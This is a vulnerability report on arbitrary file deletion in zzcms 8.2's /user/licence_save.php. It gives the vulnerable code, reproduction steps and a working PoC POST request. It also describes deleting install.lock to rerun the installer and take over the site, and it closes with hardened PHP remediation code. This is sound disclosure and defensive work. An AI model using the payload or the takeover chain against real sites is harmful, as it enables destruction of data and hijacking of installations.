user/licence_save.php

Tags: bug

Edition:

zzcms 8.2

Location:

/user/licence_save.php

Code (the vulnerable block as shipped; $oldimg and $img arrive unfiltered from the POST body):

// $oldimg and $img come straight from the modify form, e.g. $_POST['oldimg'] / $_POST['img'].
if ($oldimg<>$img && $oldimg<>"/image/nopic.gif"){
    // $oldimg is concatenated onto "../" with no validation, so it may name any file
    // reachable from the parent of /user, including "../../install.lock" or a .php script.
    $f="../".$oldimg;
    if (file_exists($f)){
        unlink($f);
    }
    // The "thumbnail" path is derived from the same untrusted string.
    $fs="../".str_replace(".","_small.",$oldimg)."";
    if (file_exists($fs)){
        unlink($fs);
    }
}

Line: 31

Harm

Arbitrary file deletion: a logged-in user can delete any file the web server process is allowed to unlink.

Cause

As the code shows, $oldimg is fully attacker-controlled and is passed to unlink() without any filtering: no extension check, no restriction to the image upload directory and no protection against "../" traversal. The only conditions are $oldimg<>$img and $oldimg<>"/image/nopic.gif", which the attacker satisfies trivially by choosing a different value for img.

Reproduction:

1. Create a file named test.php under the web root (next to /user), so there is something to delete.
2. Submit the modify request to /user/licence_save.php with oldimg=test.php, making sure the check $oldimg<>$img && $oldimg<>"/image/nopic.gif" is met (any img value other than test.php works).
3. Observe that test.php has been removed from the web root.

PoC

GET:
http://127.0.0.1:8080/user/licence_save.php?action=modify
POST:
id=11&oldimg=test.php&img=1231

Because the path is unrestricted, an attacker can delete any file the web server can write. A typical target is install.lock: with it gone, the CMS installer can be run again, letting the attacker point the site at a database of their choosing and take over the installation.

Solution

Validate the oldimg parameter before using it in a filesystem operation: restrict the value to an allow-listed set of image extensions, reject "../" and absolute paths, and check that the resolved path lies inside the intended upload directory. Better still, look up the stored image path by record id on the server side instead of trusting the value posted by the client.
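As an added example (not zzcms code, and not the patch the project shipped), the following PHP shows one way to apply the checks above to the deletion logic described in the Cause and Solution sections: an extension allow-list, realpath() canonicalisation, and a containment check against the upload directory. The directory name /image, the function names and the surrounding webroot layout are assumptions for illustration.

```php
<?php
// Added example (not zzcms code): hardened replacement for the unlink() logic
// in /user/licence_save.php. UPLOAD_BASE, safe_image_path() and
// delete_old_image() are assumed names for this illustration.

// Directory the upload images are expected to live in. zzcms's real layout
// may differ; adjust to the actual upload directory.
define('UPLOAD_BASE', realpath(__DIR__ . '/../image'));

// Returns the canonical absolute path if $rel names an existing image file
// inside UPLOAD_BASE, or null for anything else (traversal, .php, other dirs).
function safe_image_path(string $rel): ?string {
    if ($rel === '' || strpos($rel, "\0") !== false) {
        return null;                      // empty or NUL-byte smuggling
    }
    // Allow-list the extension before touching the filesystem, so "test.php"
    // and "../../install.lock" are rejected outright.
    $ext = strtolower(pathinfo($rel, PATHINFO_EXTENSION));
    if (!in_array($ext, ['jpg', 'jpeg', 'png', 'gif'], true)) {
        return null;
    }
    // realpath() resolves "..", "." and symlinks; false means the file does not exist.
    $abs = realpath(__DIR__ . '/../' . ltrim($rel, '/'));
    if ($abs === false || UPLOAD_BASE === false) {
        return null;
    }
    // Containment check: the resolved path must start with UPLOAD_BASE + separator.
    $prefix = UPLOAD_BASE . DIRECTORY_SEPARATOR;
    if (strncmp($abs, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $abs;
}

// Deletes the previous image (and its thumbnail) only when the path passes
// validation. Returns true if a file was removed.
function delete_old_image(string $oldimg, string $img): bool {
    // Same business rule as the original: keep the default picture and do
    // nothing when the image is unchanged.
    if ($oldimg === $img || $oldimg === '/image/nopic.gif') {
        return false;
    }
    $f = safe_image_path($oldimg);
    if ($f === null) {
        error_log("licence_save: refused to delete '" . $oldimg . "'");
        return false;
    }
    unlink($f);
    // Derive the thumbnail from the validated path, not from the raw input.
    // Only the final extension is rewritten, unlike str_replace(".", "_small.", ...).
    $fs = preg_replace('/\.([a-z0-9]+)$/i', '_small.$1', $f);
    if ($fs !== $f && is_file($fs)) {
        unlink($fs);
    }
    return true;
}

// Example: the PoC payload from this report is rejected, a real upload is accepted.
var_dump(delete_old_image('test.php', '1231'));            // bool(false)
var_dump(delete_old_image('/image/photo.jpg', '1231'));    // true only if that image exists under UPLOAD_BASE
```

The decisive check is the prefix comparison after realpath(): string filtering of "../" alone is bypassable through symlinks or encoding tricks, whereas comparing the canonical path keeps the deletion confined to the upload directory regardless of how the input was written. In a real fix the path should additionally come from the database row identified by id rather than from the POST body, so the client never supplies a filename at all.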